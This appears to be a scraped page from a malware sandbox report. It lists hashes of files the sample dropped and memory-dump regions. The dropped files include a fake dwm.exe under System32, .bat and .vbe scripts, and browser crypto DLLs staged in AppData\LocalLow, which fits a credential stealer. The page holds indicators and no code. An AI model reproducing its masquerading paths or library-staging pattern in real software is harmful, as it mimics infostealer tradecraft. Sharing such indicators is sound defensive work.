8c2b8ac74282dbfcebdd2d8872a132ea279a426c

SHA256
ec5c2bd58d4c32a23f7651bff65ef9a868bba760b40847cd0f92617c997f117f

SHA512
5ce4251c938c08e19c8bf5c58f40e01e589fd81d015aca6d5f95cd0aa91d68f22a1bf66b4eeb8102c26c989131a2357ba8ed76b079541644d634b3aef83047be

Download Submit
C:\Users\Admin\AppData\Roaming\vusafjc
MD5
89c3336ea6ed1ad75668c067912e7305

SHA1
2de13b667bbca2e1f0f4477007a644c09a86e533

SHA256
aaa3cda8d3f4bc7ff94a3e4f0fd37aced9d484b663bc15f198e6e25482f60443

SHA512
10226b86087eeb0d2b878fcec69b5fae7dc28ba16260cf5bc31cfb6af1f2c2ddcbcadca3c9fea5a4fcdbf983e00a734c746e0ae9a1b3ea424c1bd921198faa28

Download Submit
C:\Users\Admin\AppData\Roaming\vusafjc
MD5
89c3336ea6ed1ad75668c067912e7305

SHA1
2de13b667bbca2e1f0f4477007a644c09a86e533

SHA256
aaa3cda8d3f4bc7ff94a3e4f0fd37aced9d484b663bc15f198e6e25482f60443

SHA512
10226b86087eeb0d2b878fcec69b5fae7dc28ba16260cf5bc31cfb6af1f2c2ddcbcadca3c9fea5a4fcdbf983e00a734c746e0ae9a1b3ea424c1bd921198faa28

Download Submit
C:\Windows\System32\msaudite\dwm.exe
MD5
f3eb1441de3cebd14b359c65b5b653f5

SHA1
77be83e6961da1a8df572568bdb5441232d01f76

SHA256
1176a29ec090a8f652a04e4ef39c2a64a04620bad9e2cf408f8dc5e668fee5ff

SHA512
e5d5cd8e39fabe38a63d1bb62469413a5bd8f7fc00b933306cde702500df80a616b16980e5262e232ff85c78f8123e2fbe549b4e26070f9f3fd14eb35e6c569c

Download Submit
C:\Windows\System32\msaudite\dwm.exe
MD5
f3eb1441de3cebd14b359c65b5b653f5

SHA1
77be83e6961da1a8df572568bdb5441232d01f76

SHA256
1176a29ec090a8f652a04e4ef39c2a64a04620bad9e2cf408f8dc5e668fee5ff

SHA512
e5d5cd8e39fabe38a63d1bb62469413a5bd8f7fc00b933306cde702500df80a616b16980e5262e232ff85c78f8123e2fbe549b4e26070f9f3fd14eb35e6c569c

Download Submit
C:\reviewbrokercrtCommon\94dfcaErtMmvX.bat
MD5
ff43e4c7b1188d346031035c55623641

SHA1
5268e47d207e3d8a5ec6ed423116bde9a073a28e

SHA256
e4897ed926dc76d2c62caab76b84201fac67cb53d2c4efad75aeb4551ade19e9

SHA512
3295c4418bb9671e9b93b0ddc67c1650e12d3b905e021b355e2820a73502606278afb003673905f8eabbce96cd9afdd420239514ef8175b63e08f84a449b693a

Download Submit
C:\reviewbrokercrtCommon\kB5VrhbV.vbe
MD5
8983bf9670fc6d1327d916b0443c25c6

SHA1
562b4d499b0a542ae12d337042fe487bc21ce8d6

SHA256
1cc898da3a1510b63ca6499ef0119513196a974b58b68443bb47fd575743b7c7

SHA512
4b586e0596d90844a688e18cc9645dcaa04efa5c65cf936b239c5e2ffcb9befe44d79bfa5c3804e7930d1dce2dc7190872e81aea49b8cdfadb63865465d2a4e6

Download Submit
C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe
MD5
f3eb1441de3cebd14b359c65b5b653f5

SHA1
77be83e6961da1a8df572568bdb5441232d01f76

SHA256
1176a29ec090a8f652a04e4ef39c2a64a04620bad9e2cf408f8dc5e668fee5ff

SHA512
e5d5cd8e39fabe38a63d1bb62469413a5bd8f7fc00b933306cde702500df80a616b16980e5262e232ff85c78f8123e2fbe549b4e26070f9f3fd14eb35e6c569c

Download Submit
C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe
MD5
f3eb1441de3cebd14b359c65b5b653f5

SHA1
77be83e6961da1a8df572568bdb5441232d01f76

SHA256
1176a29ec090a8f652a04e4ef39c2a64a04620bad9e2cf408f8dc5e668fee5ff

SHA512
e5d5cd8e39fabe38a63d1bb62469413a5bd8f7fc00b933306cde702500df80a616b16980e5262e232ff85c78f8123e2fbe549b4e26070f9f3fd14eb35e6c569c

Download Submit
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\freebl3.dll
MD5
60acd24430204ad2dc7f148b8cfe9bdc

SHA1
989f377b9117d7cb21cbe92a4117f88f9c7693d9

SHA256
9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

SHA512
626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

Download Submit
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\mozglue.dll
MD5
eae9273f8cdcf9321c6c37c244773139

SHA1
8378e2a2f3635574c106eea8419b5eb00b8489b0

SHA256
a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

SHA512
06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

Download Submit
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\nss3.dll
MD5
02cc7b8ee30056d5912de54f1bdfc219

SHA1
a6923da95705fb81e368ae48f93d28522ef552fb

SHA256
1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

SHA512
0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

Download Submit
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\softokn3.dll
MD5
4e8df049f3459fa94ab6ad387f3561ac

SHA1
06ed392bc29ad9d5fc05ee254c2625fd65925114

SHA256
25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

SHA512
3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5
f964811b68f9f1487c2b41e1aef576ce

SHA1
b423959793f14b1416bc3b7051bed58a1034025f

SHA256
83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

SHA512
565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5
f964811b68f9f1487c2b41e1aef576ce

SHA1
b423959793f14b1416bc3b7051bed58a1034025f

SHA256
83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

SHA512
565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

Download Submit
memory/188-167-0x00000000001F0000-0x00000000001F7000-memory.dmp

Filesize
28KB

Download
memory/188-168-0x00000000001E0000-0x00000000001EC000-memory.dmp

Filesize
48KB

Download
memory/188-162-0x0000000000000000-mapping.dmp

Download
memory/192-133-0x0000000000400000-0x0000000000919000-memory.dmp

Filesize
5.1MB

Download
memory/192-132-0x00000000001C0000-0x00000000001FB000-memory.dmp

Filesize
236KB

Download
memory/192-118-0x0000000000000000-mapping.dmp

Download
memory/508-200-0x00000000003C0000-0x00000000003CC000-memory.dmp

Filesize
48KB

Download
memory/508-199-0x00000000003D0000-0x00000000003D6000-memory.dmp

Filesize
24KB

Download
memory/508-196-0x0000000000000000-mapping.dmp

Download
memory/628-209-0x0000000000000000-mapping.dmp

Download
memory/1104-125-0x0000000000000000-mapping.dmp

Download
memory/1104-141-0x0000000003330000-0x0000000003573000-memory.dmp

Filesize
2.3MB

Download
memory/1104-183-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/1104-142-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/1104-180-0x0000000005440000-0x0000000005651000-memory.dmp

Filesize
2.1MB

Download
memory/1128-157-0x00000000772E0000-0x000000007746E000-memory.dmp

Filesize
1.6MB

Download
memory/1128-172-0x0000000004F50000-0x0000000004F51000-memory.dmp

Filesize
4KB

Download
memory/1128-179-0x0000000004F40000-0x0000000004F41000-memory.dmp

Filesize
4KB

Download
memory/1128-158-0x0000000005560000-0x0000000005561000-memory.dmp

Filesize
4KB

Download
memory/1128-297-0x0000000007130000-0x0000000007131000-memory.dmp

Filesize
4KB

Download
memory/1128-273-0x0000000006B00000-0x0000000006B01000-memory.dmp

Filesize
4KB

Download
memory/1128-272-0x0000000006400000-0x0000000006401000-memory.dmp

Filesize
4KB

Download
memory/1128-193-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/1128-166-0x0000000004EC0000-0x0000000004EC1000-memory.dmp

Filesize
4KB

Download
memory/1128-154-0x0000000000F50000-0x0000000000F51000-memory.dmp

Filesize
4KB

Download
memory/1128-145-0x0000000000000000-mapping.dmp

Download
memory/1128-163-0x0000000002CB0000-0x0000000002CB1000-memory.dmp

Filesize
4KB

Download
memory/1256-186-0x00000000010B0000-0x00000000010B9000-memory.dmp

Filesize
36KB

Download
memory/1256-187-0x00000000010A0000-0x00000000010AF000-memory.dmp

Filesize
60KB

Download
memory/1256-185-0x0000000000000000-mapping.dmp

Download
memory/1500-225-0x0000000000370000-0x0000000000379000-memory.dmp

Filesize
36KB

Download
memory/1500-224-0x0000000000380000-0x0000000000385000-memory.dmp

Filesize
20KB

Download
memory/1500-218-0x0000000000000000-mapping.dmp

Download
memory/1540-178-0x0000000000000000-mapping.dmp

Download
memory/1628-164-0x0000000003070000-0x00000000030E4000-memory.dmp

Filesize
464KB

Download
memory/1628-165-0x0000000003000000-0x000000000306B000-memory.dmp

Filesize
428KB

Download
memory/1628-155-0x0000000000000000-mapping.dmp

Download
memory/1856-208-0x0000000000000000-mapping.dmp

Download
memory/2068-201-0x0000000000000000-mapping.dmp

Download
memory/2068-204-0x00000000030A0000-0x00000000030A4000-memory.dmp

Filesize
16KB

Download
memory/2068-206-0x0000000003090000-0x0000000003099000-memory.dmp

Filesize
36KB

Download
memory/2072-149-0x0000000000400000-0x0000000000919000-memory.dmp

Filesize
5.1MB

Download
memory/2072-135-0x0000000000000000-mapping.dmp

Download
memory/2160-114-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2160-115-0x0000000000402E1A-mapping.dmp

Download
memory/2172-170-0x0000000000400000-0x0000000000946000-memory.dmp

Filesize
5.3MB

Download
memory/2172-150-0x0000000000000000-mapping.dmp

Download
memory/2172-169-0x0000000000BF0000-0x0000000000C81000-memory.dmp

Filesize
580KB

Download
memory/2192-228-0x00000000044E0000-0x00000000044E1000-memory.dmp

Filesize
4KB

Download
memory/2192-256-0x0000000008C50000-0x0000000008C51000-memory.dmp

Filesize
4KB

Download
memory/2192-232-0x00000000070F0000-0x00000000070F1000-memory.dmp

Filesize
4KB

Download
memory/2192-245-0x0000000007F60000-0x0000000007F61000-memory.dmp

Filesize
4KB

Download
memory/2192-255-0x0000000008BE0000-0x0000000008BE1000-memory.dmp

Filesize
4KB

Download
memory/2192-231-0x0000000007080000-0x0000000007081000-memory.dmp

Filesize
4KB

Download
memory/2192-216-0x0000000000000000-mapping.dmp

Download
memory/2192-227-0x00000000071C0000-0x00000000071C1000-memory.dmp

Filesize
4KB

Download
memory/2192-261-0x00000000044E3000-0x00000000044E4000-memory.dmp

Filesize
4KB

Download
memory/2192-238-0x00000000047A0000-0x00000000047A1000-memory.dmp

Filesize
4KB

Download
memory/2192-254-0x0000000008CC0000-0x0000000008CC1000-memory.dmp

Filesize
4KB

Download
memory/2192-233-0x0000000007840000-0x0000000007841000-memory.dmp

Filesize
4KB

Download
memory/2192-230-0x0000000007050000-0x0000000007051000-memory.dmp

Filesize
4KB

Download
memory/2192-229-0x00000000044E2000-0x00000000044E3000-memory.dmp

Filesize
4KB

Download
memory/2192-226-0x00000000043F0000-0x00000000043F1000-memory.dmp

Filesize
4KB

Download
memory/2220-189-0x0000000000000000-mapping.dmp

Download
memory/2220-195-0x0000000002D70000-0x0000000002D79000-memory.dmp

Filesize
36KB

Download
memory/2220-194-0x0000000002D80000-0x0000000002D85000-memory.dmp

Filesize
20KB

Download
memory/2324-190-0x0000000000000000-mapping.dmp

Download
memory/2324-202-0x0000000000400000-0x0000000000919000-memory.dmp

Filesize
5.1MB

Download
memory/2848-161-0x0000000000000000-mapping.dmp

Download
memory/2952-121-0x0000000000000000-mapping.dmp

Download
memory/3008-171-0x0000000000000000-mapping.dmp

Download
memory/3008-182-0x0000000002D40000-0x0000000002D4B000-memory.dmp

Filesize
44KB

Download
memory/3008-181-0x0000000002D50000-0x0000000002D57000-memory.dmp

Filesize
28KB

Download
memory/3016-117-0x00000000012F0000-0x0000000001306000-memory.dmp

Filesize
88KB

Download
memory/3028-223-0x0000000000400000-0x0000000000919000-memory.dmp

Filesize
5.1MB

Download
memory/3028-197-0x0000000000000000-mapping.dmp

Download
memory/3028-220-0x0000000000B00000-0x0000000000C4A000-memory.dmp

Filesize
1.3MB

Download
memory/3168-203-0x0000000000000000-mapping.dmp

Download
memory/3260-116-0x0000000000030000-0x000000000003A000-memory.dmp

Filesize
40KB

Download
memory/3292-222-0x0000000000330000-0x0000000000339000-memory.dmp

Filesize
36KB

Download
memory/3292-221-0x0000000000340000-0x0000000000345000-memory.dmp

Filesize
20KB

Download
memory/3292-205-0x0000000000000000-mapping.dmp

Download
memory/3640-148-0x0000000004F70000-0x000000000546E000-memory.dmp

Filesize
5.0MB

Download
memory/3640-140-0x0000000005470000-0x0000000005471000-memory.dmp

Filesize
4KB

Download
memory/3640-143-0x0000000004E20000-0x0000000004E21000-memory.dmp

Filesize
4KB

Download
memory/3640-281-0x0000000005050000-0x0000000005071000-memory.dmp

Filesize
132KB

Download
memory/3640-134-0x0000000000490000-0x0000000000491000-memory.dmp

Filesize
4KB

Download
memory/3640-159-0x0000000004ED0000-0x0000000004ED1000-memory.dmp

Filesize
4KB

Download
memory/3640-129-0x0000000000000000-mapping.dmp

Download
memory/3832-553-0x0000000000000000-mapping.dmp

Download
memory/3880-139-0x0000000000000000-mapping.dmp

Download
memory/4060-176-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/4060-188-0x0000000000960000-0x0000000000962000-memory.dmp

Filesize
8KB

Download
memory/4060-173-0x0000000000000000-mapping.dmp

Download
memory/4280-250-0x0000000002410000-0x0000000002415000-memory.dmp

Filesize
20KB

Download
memory/4280-251-0x0000000000850000-0x0000000000855000-memory.dmp

Filesize
20KB

Download
memory/4280-249-0x0000000000800000-0x0000000000806000-memory.dmp

Filesize
24KB

Download
memory/4280-246-0x000000001AF70000-0x000000001AF72000-memory.dmp

Filesize
8KB

Download
memory/4280-240-0x0000000000000000-mapping.dmp

Download
memory/4484-296-0x0000000009B00000-0x0000000009C5B000-memory.dmp

Filesize
1.4MB

Download
memory/4484-292-0x0000000007233000-0x0000000007234000-memory.dmp

Filesize
4KB

Download
memory/4484-290-0x000000000A010000-0x000000000A011000-memory.dmp

Filesize
4KB

Download
memory/4484-275-0x0000000007230000-0x0000000007231000-memory.dmp

Filesize
4KB

Download
memory/4484-276-0x0000000007232000-0x0000000007233000-memory.dmp

Filesize
4KB

Download
memory/4484-262-0x0000000000000000-mapping.dmp

Download
memory/4708-282-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/4708-285-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/4708-283-0x000000000044003F-mapping.dmp

Download
memory/4892-298-0x0000000000000000-mapping.dmp

Download
memory/4892-356-0x00000000045C3000-0x00000000045C4000-memory.dmp

Filesize
4KB

Download
memory/4892-333-0x000000007DF40000-0x000000007DF41000-memory.dmp

Filesize
4KB

Download
memory/4892-305-0x00000000045C2000-0x00000000045C3000-memory.dmp

Filesize
4KB

Download
memory/4892-304-0x00000000045C0000-0x00000000045C1000-memory.dmp

Filesize
4KB

Download